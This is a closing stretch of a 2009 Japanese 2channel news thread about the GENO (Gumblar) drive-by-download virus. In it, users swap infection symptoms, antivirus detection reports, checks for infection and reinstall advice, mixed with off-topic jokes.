ウィルス本体はかなりの早さでアップデートされてるから、ウィルス挙動によっては
いつぞやの韓国みたいにインターネットが止まるような事態にすら発展しかねないのだが・・

865仮面の奇行士 ◆Balrog/4lY :2009/05/19(火) 23:17:39 ID:kaXH8UCjO


>>853
大変ですな。

そういう専門的なことは板を変えて質問した方が絶対いいぞ。適切な板を探してみなされ。


866名無しさん@九周年:2009/05/19(火) 23:29:30 ID:XRw1xYU00
AntiVirは偉大だわ。まじ惚れた。
867名無しさん@九周年:2009/05/19(火) 23:50:15 ID:3m8KwCe80
>>864
TVのニュースで取り上げたら、新型インフルの話とごっちゃになって
視聴者が混乱するから控えておこうとかなんとか考えてるような気がしないか?
868名無しさん@九周年:2009/05/19(火) 23:56:05 ID:Gdj92R8l0
それにしてもスレタイに緊迫感が全く無いな
Web見るだけでPCクラッシュとか初耳なんだが良くある事なの?
869名無しさん@九周年:2009/05/20(水) 00:05:08 ID:Qy2Sxxeq0
>>868
映画じゃよくあること
870名無しさん@九周年:2009/05/20(水) 00:11:39 ID:iGCw3hbD0
>>868
前にも何かあった気がする。
ココまで酷くはなかったかもしれないけど・・・
871名無しさん@九周年:2009/05/20(水) 00:19:21 ID:91CHwUtt0
スレタイが恐怖を煽らないと緊迫感が出ないんではないかい?

【セキュリティ】サイトが改ざん被害、普通に閲覧で史上最悪のコンピューターウィルス感染も

とか?
872名無しさん@九周年:2009/05/20(水) 00:27:25 ID:H78oABP+0
確かにスレタイが駄目すぎるよな。人目を引かん。
と言う訳でageるぜよ
873名無しさん@九周年:2009/05/20(水) 00:30:50 ID:7fzjivAZ0
うちのカスペルさんはブロックしてくれるのか?
874名無しさん@九周年:2009/05/20(水) 00:49:28 ID:z87NY/nf0
どっちに比重を置くかだが
俺は賢い人のアドバイスに従い
さっさと制限ユーザーにした
ウイルス対策ソフトは入れてない
875名無しさん@九周年:2009/05/20(水) 00:50:06 ID:m6+mNfeW0
そこは入れておけよwww
876名無しさん@九周年:2009/05/20(水) 00:50:43 ID:UXc3+gy20
【セキュリティ】サイト閲覧だけで感染!凶悪PCウィルス被害…ウィルススキャンも効果なし?

情報を簡単にまとめるとこんな感じのようだが煽りすぎかなw
877現役の人:2009/05/20(水) 00:52:49 ID:vHzbeQMV0
>>876
> 【セキュリティ】サイト閲覧だけで感染!凶悪PCウィルス被害…ウィルススキャンも効果なし?
>
> 情報を簡単にまとめるとこんな感じのようだが煽りすぎかなw


【セキュリティ】サイト閲覧だけで感染!凶悪PCウィルス猛威…ウィルススキャンも未だ未対応

こんな感じじゃね
878名無しさん@九周年:2009/05/20(水) 01:02:09 ID:asdPto8m0
立ち上がり時
biosとosの間はロックできる。
問題は これなんだがね。
879名無しさん@九周年:2009/05/20(水) 01:43:02 ID:lcmWgjHY0
>>765
>VIPを中心に、801同人サイトを版権者へ通報&凸晒し祭りの準備が始まる 

で、また意味のわからん当て字と身内用語だらけになるのか。
あの妙な身内意識のキモさは、鬼女板の比じゃねぇぜ。
もっと恐ろしいものの片鱗を味わうんだぜ・・・

やっぱし、ダム板が一番常識的でイケメンエリート揃いでいいよな。
880岸和田市民 ◆HOXERHLOXY :2009/05/20(水) 01:46:32 ID:m7+2mxQw0 BE:306180555-2BP(2251)
どこだってそうだろ。
881名無しさん@九周年:2009/05/20(水) 01:51:36 ID:5ksPdOhF0
ほんとコテは糞レスしかしないな
882名無しさん@九周年:2009/05/20(水) 02:10:00 ID:f1o/fcjq0
とりあえず、今のとこ感染が疑われる問題は何もないな。しかし、電脳も現実もウイルスにしてやられてるのう。
883名無しさん@九周年:2009/05/20(水) 02:26:31 ID:Y8f2KfgB0
218 名前:192.168.0.774[sage] 投稿日:2009/05/19(火) 23:44:22 ID:0vthBrIC0
ベクターグッジョブ!
http://shop.vector.co.jp/service/special/security/
884名無しさん@九周年:2009/05/20(水) 02:33:43 ID:xrfHwWHS0
こんな悪質なウイルスってもうテロレベルだろ
こういうのって犯人を特定して捕まえるのって難しいの?
885名無しさん@九周年:2009/05/20(水) 02:56:38 ID:Wc/a20zY0
ひんと:中国様
886( ´`ω´)φ ★:2009/05/20(水) 05:40:54 ID:???0
ものすごい勢いで広告・宣伝を報告するスレ 167
http://qb5.2ch.net/test/read.cgi/sec2chd/1242102261/365

【セキュリティ】サイト閲覧だけで感染!凶悪PCウィルス猛威…ウィルススキャンも未だ未対応
http://tsushima.2ch.net/test/read.cgi/newsplus/1242546568/

むぎゅぎゅぎゅ。
887名無しさん@九周年:2009/05/20(水) 05:43:53 ID:zHxGszmK0
ヒューリスティックでも捕まえられなかったの?
888名無しさん@九周年:2009/05/20(水) 06:39:01 ID:JCu298kmO
Vistaでは今のとこ感染しないの?
889名無しさん@九周年:2009/05/20(水) 07:45:24 ID:DgG5lyCT0
亜種が出てきてるからなんとも言えない状況
だった気がする
890名無しさん@九周年:2009/05/20(水) 08:01:21 ID:1tIctchoO
糸ようじで駆除でしょ
891名無しさん@九周年:2009/05/20(水) 08:14:55 ID:8i9VsO/m0
>>39
そういうの使わないとサイト作ってる会社が金取る口実にならないからだろ。
画像とテキストだけならビルダー使って自分でやろっかて話になる。
892名無しさん@九周年:2009/05/20(水) 08:21:37 ID:mMhooQBZ0
数日前に親用のPC教室のサイト調べてて、あるサイトに飛んだら
Avast!がこのウィルスに反応して隔離してくれた。
たまたまVistaマシンで回ってたし、問題は無かった。

AdobeのReaderとFlash Playerを最新版にして、
JAVAスクリプト切ってFirefoxにNoScript入れれ。
893名無しさん@九周年:2009/05/20(水) 08:24:33 ID:mMhooQBZ0
Avast!では「トロイの木馬」型として検出されたよ。
しかしPC教室のサイトまで感染してたなんて。
894名無しさん@九周年:2009/05/20(水) 08:26:26 ID:dheXFJ+e0
【レス抽出】
対象スレ:【セキュリティ】サイトが改ざん被害、閲覧でウイルス感染の可能性(小林製薬)[09/05/14]
キーワード:糸ようじ

抽出レス数:20

www
895名無しさん@九周年:2009/05/20(水) 08:27:52 ID:mMhooQBZ0
>>888
UACを切ってなければ今のところ大丈夫なはず。
896名無しさん@九周年:2009/05/20(水) 08:49:42 ID:W9Zu6Ptr0
小林製薬のメールマガジンから、お風呂の裏技みたいなページを読んだ
次にPCを開いた時、エクスプローラーが起動しなかった(画面に何も表示されず)
ので、タスクマネージャから自力で起動、スタートアップ項目も思いつくやつは自力で起動
この時点では、たんにPCの不調という認識だった

翌日、小林製薬からお詫びのメール、タイミング的に感染した可能性が高い
コマンドプロンプト起動不可、レジストリエディタ起動不可
sqlsodbc.chmファイルのサイズは1.29KB(1323バイト)
紹介されていたサイトのオンラインスキャンを実施
見つかったのはTrackingCookie数個だけ、すべて除去

現時点では、まだ不具合は解消せず、泣きそう
897名無しさん@九周年:2009/05/20(水) 09:20:09 ID:1VbT1bLgO
感染済みの場合は
ノートンしか反応しない
ノートンあったら大至急入れろ
898名無しさん@九周年:2009/05/20(水) 09:38:43 ID:1YX8WHLb0
ActivX切っておけば大丈夫じゃないのか
899名無しさん@九周年:2009/05/20(水) 09:42:12 ID:u510bO41O
>>896
容赦なくOS再インスコ
これしかない
900名無しさん@九周年:2009/05/20(水) 10:06:54 ID:StpDxivx0
>>896
ひでえw
罠のようだ・・・
901名無しさん@九周年:2009/05/20(水) 10:33:16 ID:sTV4aR6J0
>>896
ご愁傷様ですとしか言いようが…
現時点では本当に可哀想だが対処法は>>899しかない。
FTPは使ってないよな?絶対使うなよ!
902名無しさん@九周年:2009/05/20(水) 10:39:36 ID:uZezsiqs0
安置ウイルスソフトとかSpybot入れてれば二段階で防止できたのに、
御愁傷様、
903名無しさん@九周年:2009/05/20(水) 10:46:24 ID:SOElXb570
トロイの木馬から新型インフルエンザまで効く
小林製薬の抗ウイルス剤ソフトの宣伝じゃないの?
904名無しさん@九周年:2009/05/20(水) 10:46:43 ID:DnosNyfq0
905名無しさん@九周年:2009/05/20(水) 10:48:56 ID:nPpnj5/d0
小林製薬「閲覧 その前に」
906名無しさん@九周年:2009/05/20(水) 11:31:33 ID:UY0tIqpf0
感染の有無をチェックする簡易検査法

スタート→ファイル名を指定して実行→regedit.exe

「レジストリ・エディタ」が起動すればシロ。
ちなみに「レジストリ・エディタ」はいじらずに閉じましょう。
下手にいじると危ないです。
907名無しさん@九周年:2009/05/20(水) 11:34:31 ID:xrfHwWHS0
このまえウイルスバスターをコンビニ支払いで更新したばっかなんだけど
PCを再インストールしてウイルスバスターを入れなおした場合どうなる?
908名無しさん@九周年:2009/05/20(水) 11:38:01 ID:Cg7AOtEW0
見逃すとか目立たないとか言うけど
2chの一板が全てじゃないでしょう
909名無しさん@九周年:2009/05/20(水) 11:38:40 ID:8JAUj3K30
>>907
最インスコ前にシリアルナンバーメモっとけばおk
910名無しさん@九周年:2009/05/20(水) 11:39:52 ID:j10fqVPyP
>>907
インストール用のアカウントとかあるなら再インストールできるんじゃないか?
911名無しさん@九周年:2009/05/20(水) 11:40:26 ID:UY0tIqpf0
糸ようじ
エッチデーデー
912名無しさん@九周年:2009/05/20(水) 11:40:57 ID:xrfHwWHS0
>>909
ありがと

ウイルスバスターはいつごろGENOを感知駆除できるようになるかな
早くして欲しい
913名無しさん@九周年:2009/05/20(水) 11:46:08 ID:xrfHwWHS0
>>910
ありがと
はがきみたいなのにシリアル番号あったわ
914名無しさん@九周年:2009/05/20(水) 12:19:51 ID:0WseOlzQO

プニルからFFに乗り換える
良い機会になったw
便利すぎ泣いたw
915名無しさん@九周年:2009/05/20(水) 13:02:49 ID:vGk/IEcD0
     _____________
   /|:: ┌──────┐ ::|
  /.  |:: |  AVAST!  | ::|   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  |.... |:: |GENOウイルス| ::|   |  よっしゃ。安心して開けてられるな。
  |.... |:: | 感染を防止 | ::|   \_  ___________ 
  |.... |:: └──────┘ ::|      ∨
  \_|    ┌────┐   .|     ∧∧
      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ .∬  (  _)
             / ̄ ̄ ̄ ̄ ̄旦 ̄(_,   )
            /             \  `
           | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄_|、_) 
             ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄|
              ̄           ̄
     _____________
   /|:: ┌──────┐ ::|
  /.  |:: |全撃墜ソフト | ::| 
  |.... |:: |AhnLab-V3  | ::|   
  |.... |:: |AntiVir AVG | ::|   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  |.... |:: | Kaspersky  | ::|   | いやー遊んだ遊んだ…。 アレ?
  |.... |:: |McAfee Micro| ::|   \_  ________
  |.... |:: └──────┘ ::|      ∨
  \_|    ┌────┐   .|    ∧∧
      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ .   (  _)
             / ̄ ̄ ̄ ̄ ̄旦 ̄(_,   )
            /             \  `
           | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|、_) 
             ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄| ̄
916名無しさん@九周年:2009/05/20(水) 13:04:17 ID:3lDN854D0
はじめて糞VISTAが役に立ったw
917名無しさん@九周年:2009/05/20(水) 13:04:45 ID:sTV4aR6J0
>>906
もうその情報は古いがな。
レジストリエディタ立ち上がっても感染してる場合もあるがな。

今のところはXPならsqlsodbc.chmのサイズと更新日で判断するって事になってる。
でもウイルスが更に進化してて、これも偽装するようになってたら・・・
918名無しさん@九周年:2009/05/20(水) 13:14:53 ID:1YX8WHLb0
これ、ヴィスタは感染しないのか?

はは〜。するってえと、XPを市場から消して、時期ウィンドウズの販売を促進させようとする
マイクロソフト社の陰謀だな。

奴らならやりかねない。
919名無しさん@九周年:2009/05/20(水) 13:15:54 ID:Ru+AsABRO
アメブロ狙ってスイーツ(笑)一掃すればいいのに
920名無しさん@九周年:2009/05/20(水) 13:17:12 ID:yzqNYD2fO
警鐘age
921名無しさん@九周年:2009/05/20(水) 13:25:54 ID:ZnTNUBQi0
「小林製薬のいとようじ!」 by 大泉洋
922名無しさん@九周年:2009/05/20(水) 13:36:32 ID:sTV4aR6J0
>>921
このウイルスに感染するとエッチデーデーが大変なことになると言うのにお前と来たら
923名無しさん@九周年:2009/05/20(水) 13:37:34 ID:3eaEr47f0
>>922
大泉の知り合いの電気屋乙
924名無しさん@九周年:2009/05/20(水) 13:38:07 ID:XvYO4JJS0
このウイルスに感染するとエッチデーが大変なことになると言うのにお前と来たら
925名無しさん@九周年:2009/05/20(水) 13:38:50 ID:UY0tIqpf0
>>923
従兄弟の車屋さんじゃなかった?
926名無しさん@九周年:2009/05/20(水) 13:43:50 ID:ZnTNUBQi0
エッチデーデーで何の違和感も無いが、一般人はエイチディーディーなんだろうなあ。電話でフォネティックとか
使ったこと無いんだろうなあ。
927名無しさん@九周年:2009/05/20(水) 13:44:09 ID:sTV4aR6J0
>>923>>925
従兄弟の車屋のみっちゃんな。家全部にエッチデーデーはいってるからな!
928923:2009/05/20(水) 13:57:28 ID:3eaEr47f0
>>925
>>927
スマソ 俺の記憶違いだったみたいだ。
にしても水どうファンは良い人が多いな。
929名無しさん@九周年:2009/05/20(水) 14:17:10 ID:DgG5lyCT0
なんで水どうスレになってんだよwwon
930名無しさん@九周年:2009/05/20(水) 14:29:44 ID:ZnTNUBQi0
糸ようじあげ
931名無しさん@九周年:2009/05/20(水) 14:49:41 ID:T7MhpMUG0
このウィルス用のマスク早く作ってくれ
マジ怖い
932名無しさん@九周年:2009/05/20(水) 15:19:55 ID:5ksPdOhF0
エッチデーデーだから大丈夫だろ
933名無しさん@九周年:2009/05/20(水) 15:35:11 ID:P/IS3vYH0
>>926
ヘンリー・デルタ・デルタ?

ふなむし〜
934名無しさん@九周年:2009/05/20(水) 15:46:16 ID:mhm/d+VMO
これって、感染状態でLAN切って立ち上げると、BSODなんだよな?
姉貴のパソがそれっぽい症状なんだが・・・。
935名無しさん@九周年:2009/05/20(水) 15:54:21 ID:i//qPt5q0
>>906
やってみたら起動したからセーフ…なのかな

936名無しさん@九周年:2009/05/20(水) 17:07:16 ID:PssZjKEc0
欠陥商品しか売らないマイクロソフト史上、紛う方なき真性の欠陥商品だの
ME以上の糞OSだの、
「VISTA使ってんの?Mなの?バカなの?朝鮮人なの?プププププププ〜」ってさんざんバカにされてきたけど、
使っていればいいこともあるんだな…
937名無しさん@九周年:2009/05/20(水) 17:10:30 ID:oQT2Hvwi0
POWRE USER使えば良いだけじゃん
別にVISTAじゃなくても良いと思うんだが
ここの連中は管理者でログインしっぱなしなのか?
そっちの方が問題だと思うが。。、
938名無しさん@九周年:2009/05/20(水) 17:18:42 ID:JG6iFC2e0
ねえねえ 感染サイトにアクセスして 感染を検知する ソフトはマダでないの?
939名無しさん@九周年:2009/05/20(水) 17:21:18 ID:XDtq6e9j0
AVASTちゃん
940名無しさん@九周年:2009/05/20(水) 17:30:02 ID:i9O7fQc60
>>939
マジ?ノートンとかバスターとかの大手のやつ対応してないの??
そんなにむつかしいことなんだろうか
941名無しさん@九周年:2009/05/20(水) 17:33:02 ID:XDtq6e9j0
あ 誤解しないで
バスターもノートンも対応したみたいだから
ただAVASTは無料なのに一番始めに検知していたエロいやつだったんで
942名無しさん@九周年:2009/05/20(水) 17:59:31 ID:jKSdwPBR0
やっとウィルスバスター来たのか
長かったな〜もう今週は無理かと思ってた
943名無しさん@九周年:2009/05/20(水) 18:00:28 ID:sTV4aR6J0
早く次スレになれage
944名無しさん@九周年:2009/05/20(水) 18:00:32 ID:5ksPdOhF0
2年ぶりにノートン先生更新するか?
945名無しさん@九周年:2009/05/20(水) 18:09:22 ID:QxMnDh0f0
なんか「さっさとvista以降に買い換えろよプププ」と言われてるような気がしてならない。
これからは新しいOSがでるたびにウィルスが猛威を奮うんじゃなかろうな。
946名無しさん@九周年:2009/05/20(水) 18:09:30 ID:QEozjhu30
なんか亜種が多いっていう書き込みをよく見るんだが
そういうのにも対応してるのかね
947名無しさん@九周年:2009/05/20(水) 18:12:57 ID:UY0tIqpf0
>>945

それならむしろリスク回避のためMSから乗り換える人が増えるのでは?
948名無しさん@九周年:2009/05/20(水) 18:32:26 ID:sTV4aR6J0
949名無しさん@九周年:2009/05/20(水) 18:50:41 ID:i9O7fQc60
>>941
トンです。
950名無しさん@九周年:2009/05/20(水) 18:56:11 ID:OJNppv800
サイト改竄情報がいちばん速いのは・・・ 2ちゃんかも知れんな
951名無しさん@九周年:2009/05/20(水) 19:06:48 ID:JRODV7vC0
>>934
感染しているかどうか確かめて、
してたら、クリーンインストール。
952名無しさん@九周年:2009/05/20(水) 19:11:04 ID:dHXgB1PTP BE:2547629069-2BP(32)
>>934
できれば
これやってみて下さい
http://geno.2ch.tc/#h
953名無しさん@九周年:2009/05/20(水) 19:16:01 ID:QxMnDh0f0
>>947
ライトユーザーはあんまりそういう選択肢もてないような気がする。
954名無しさん@九周年:2009/05/20(水) 21:22:11 ID:RZyaQNM40
flashのサイトみただけで感染するウィルスが流行りつつあるみたいだし
http://headlines.yahoo.co.jp/hl?a=20090520-00000011-rbb-sci
これを機にsilverlightがはやるなんてことは…
955名無しさん@九周年:2009/05/20(水) 22:07:10 ID:OtxrklTQ0

いわゆる“GENOウイルス”が猛威、G DATAがその挙動を解説
http://internet.watch.impress.co.jp/cda/news/2009/05/20/23509.html

G DATA Software株式会社は20日、いわゆる“GENOウイルス”が日本で猛威をふるっているとして、
その挙動を解説するとともに、インターネットユーザーに対策を呼び掛けている。

日本の通販サイトや同人サイトが感染被害

 このウイルスは、Adobe FlashやAdobe Reader/Acrobatの脆弱性を突き、ウイルスを仕込んだサイトに誘導することで感染を試みる。

何かをクリックしたり、ダウンロードしたりしなくても、細工されたWebサイトをブラウザで
開いただけで感染する「ドライブバイダウンロード」と呼ばれるものの一種にあたる。

 G DATAによると、4月ごろから日本企業のWebサイトや個人サイトなどが改ざんされる被害が多発しており、
実際に感染被害に遭ったPC通販サイト「GENO」の名前をとって、ネット上では“GENOウイルス”と総称されている。

5月中旬にはアニメや漫画、ゲームなどの同人サイトが連鎖的に感染するに至り、
「昨今の豚インフルエンザのパンデミックと重ね合わせて、現在ややパニック状態に陥っているのが現状」。

956名無しさん@九周年:2009/05/20(水) 22:12:33 ID:z1TQQV6G0
>>955
一介のPCパーツ屋の名前が、どんどん広がっていくな・・・
宣伝効果は計り知れない・・・
957小林製薬の糸ようじ:2009/05/20(水) 22:14:00 ID:jhDtJqFx0
小林製薬の糸ようじ
958名無しさん@九周年:2009/05/20(水) 22:16:19 ID:KrpTfnXV0
GEN○
959名無しさん@九周年:2009/05/20(水) 22:21:41 ID:Zz5w4vMPO
ネット社会を脅かすのは麻薬と同じくらい重罪

960名無しさん@九周年:2009/05/20(水) 22:22:26 ID:XDtq6e9j0
>>956
PC関係者なのに対処法を「クッキー削除して下さい」で済ませた
伝説を残したから
961名無しさん@九周年:2009/05/20(水) 22:29:32 ID:e+HM9RnVP
>>960
ちょっと違う
http://www.geno.co.jp/webshop/okyakusama.html

>お客様側の対処といたしましてはwebブラウザのキャッシュをリセットして頂く事をお願い致します。
>尚、サーバーのウィルス感染や個人情報の流出はございません。

もうね、悪意のあるレベル。
日本におけるパンデミックは、このGENOの対応に大きな原因があると言っても過言じゃない。
962名無しさん@九周年:2009/05/20(水) 22:48:27 ID:RrFGaZuX0
どうオタはそろそろ自重してくれ
963名無しさん@九周年:2009/05/20(水) 23:00:03 ID:RZyaQNM40
なんか感染しそうで>>961を怖くてクリックできんw
964名無しさん@九周年:2009/05/20(水) 23:23:14 ID:jKSdwPBR0
まあもうぐぐるにもこの名称じゃないと
情報が上手く拾えないからなあ
965名無しさん@九周年:2009/05/21(木) 00:25:09 ID:pRRW2CyZ0
注意喚起あげ
966名無しさん@九周年:2009/05/21(木) 02:22:55 ID:9wv85RMW0

       _,,-'' ̄ ̄`-、
       /        \
      ,/           \
     /   ―  ―     ヽ
    lヽ  - 、 ! , _     |
    |r――-、_⊥ ,――'-、 |,-,
    |::::::::::::::::/ |ヽ:::::::::::::::|-|'イ!| <Genocide
     ト、__,,/:  |: `、__,,/ ,|ソ/
     .|    、_ j| _,、     ,|-'
     |   /lll||||||||||l`、   ,|
     `i ,|||' ̄= ̄`|||、 / ト、
     「|ヽ|ll||||||||||||||||| /i |::::\
    /:::::\`!!||||||||||||!!'   |::::::::\
   /::::::::::::::`ー-、.._ i     |::::::::::::::\
  /:::::::::::::::::::::::::::::::::::`ー-、. |::::::::::
967名無しさん@九周年:2009/05/21(木) 02:26:26 ID:1wf51pDH0
クソワロタ
968名無しさん@九周年:2009/05/21(木) 11:17:06 ID:hEtMvWrf0
>>917
未だにいたちごっこ状態なのか?
969名無しさん@九周年:2009/05/21(木) 11:20:03 ID:0Y4IHwgY0
マスクをすれば感染は防げる。
970名無しさん@九周年:2009/05/21(木) 11:23:59 ID:XCA7Lwfa0
うちのPC、熱があるみたいなんだけど・・・
971名無しさん@九周年:2009/05/21(木) 11:33:36 ID:4DQXFeEo0
WindowsとMac以外にも便利に使える新しいOSって出ないものなのかな
972名無しさん@九周年:2009/05/21(木) 12:09:14 ID:hQvRDrsxP
これってGENOが原因なのか?
973名無しさん@九周年:2009/05/21(木) 12:32:09 ID:7Me9ARzl0
>>970
つ□ 冷えピタ
974名無しさん@九周年:2009/05/21(木) 13:01:09 ID:6iMvqEba0
これって、ネットワークPCにも感染すんの?
975名無しさん@九周年:2009/05/21(木) 13:02:16 ID:sllstQsV0
martuz.cnが閉鎖して、落ち着いた感じはあるけど
この静けさが逆に怖いなー・・・
976名無しさん@九周年:2009/05/21(木) 13:15:50 ID:3WBFHyQq0
>>966
ロブさん何してんすか
977名無しさん@九周年:2009/05/21(木) 19:28:25 ID:Ofwskn8l0
>>971
Linux系はまさにそれじゃないの?
ネット見たりメールしたりなら十分だと思うけど。
978名無しさん@九周年:2009/05/21(木) 20:51:24 ID:bImcq4+E0
>>975
別の国のドメインに移動してそれがまた閉鎖したような?
情報が錯綜してわけわかめ
979名無しさん@九周年:2009/05/21(木) 20:53:32 ID:gzNQz5V90
まだ終わったわけじゃないんだよな……
980名無しさん@九周年:2009/05/21(木) 21:07:53 ID:sllstQsV0
>>975
攻撃サイトは、zlkon.lv(ラトビア)→gumblar.cn(中国)→martuz.cn(イギリス)って
移って行って、最新のmartuz.cnが、今停止状態。

またどこかに移動するのか、これで攻撃やめるか。後者だと良いんだけどね。
981名無しさん@九周年:2009/05/21(木) 21:10:35 ID:xQFJRR5bO
小林製薬の糸ようじ
982名無しさん@九周年:2009/05/21(木) 21:29:35 ID:ooNW8J4x0
>>980
前者が濃厚という・・・・・・
983名無しさん@九周年:2009/05/21(木) 23:11:16 ID:vO8i7mlR0
早く終息しないかな
984名無しさん@九周年:2009/05/22(金) 10:00:22 ID:qLy0Lek10
ちょ、まだこのスレ終わってないのかよw
埋めろ埋めろ、糸ようじでも何でもいいからw
985名無しさん@九周年:2009/05/22(金) 10:14:40 ID:NbLU3D/R0
これまだウィルスソフトは検出は出来るけど駆除はできないんだよね?

とりあえず注意喚起あげ
986名無しさん@九周年:2009/05/22(金) 10:30:18 ID:qLy0Lek10
そうなのよ、結局感染したらクリーニンスコ一択。
現在は沈静化してるけど、これからまたどうなるかわからない。
(今までの例からして、ホスト移動して再攻撃はじめるのは週末じゃないかと言われてる)
だから早いとこ2スレ目が立って欲しいんだけんども。
987名無しさん@九周年:2009/05/22(金) 10:33:10 ID:uRfq2vVz0
>>985
えー
再インストールめんどくさいな
988名無しさん@九周年:2009/05/22(金) 10:37:44 ID:qLy0Lek10
クリーニンスコって何だよ。
クリーンインスコ(クリーンインストール)です、失礼。
989名無しさん@九周年:2009/05/22(金) 10:56:36 ID:ELeWvFyU0



  ク  リ  ー  ニ  ン  ス  コ  
990名無しさん@九周年:2009/05/22(金) 11:00:14 ID:qLy0Lek10
やめてぇぇ!もう放っておいてぇぇ!
991名無しさん@九周年:2009/05/22(金) 11:45:18 ID:rYotKgpd0
以後1000までクリーニンスコで埋まります
992名無しさん@九周年:2009/05/22(金) 12:09:35 ID:qLy0Lek10
ああ、もうそれでも良いよ。

クリーニンスコ!
993名無しさん@九周年:2009/05/22(金) 12:10:16 ID:NbLU3D/R0
逆に考えるんだ。クリーニンスコは欧米式発音であると考えるんだ。
994名無しさん@九周年:2009/05/22(金) 12:16:28 ID:qLy0Lek10
クリーニンスコ に一致する日本語のページ 24 件中 1 - 24 件目 (0.43 秒)

良かった自分だけじゃなかった!


・・・少ねえ・・・。
995名無しさん@九周年:2009/05/22(金) 12:53:12 ID:stBvFJLs0
よーし 1000取り合戦だ いくぞ!!
996名無しさん@九周年:2009/05/22(金) 13:07:33 ID:NbLU3D/R0
ふみだい
997名無しさん@九周年:2009/05/22(金) 13:07:39 ID:yqOJ7riA0
1000なら今週末亜種発動
998名無しさん@九周年:2009/05/22(金) 13:18:45 ID:qLy0Lek10
>>995
人いねーから合戦にならねえw
999名無しさん@九周年:2009/05/22(金) 13:20:34 ID:rYotKgpd0
↓どうぞ
1000名無しさん@九周年:2009/05/22(金) 13:21:22 ID:qLy0Lek10
じゃあ1000なら皆クリーニンスコしないで済む!
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。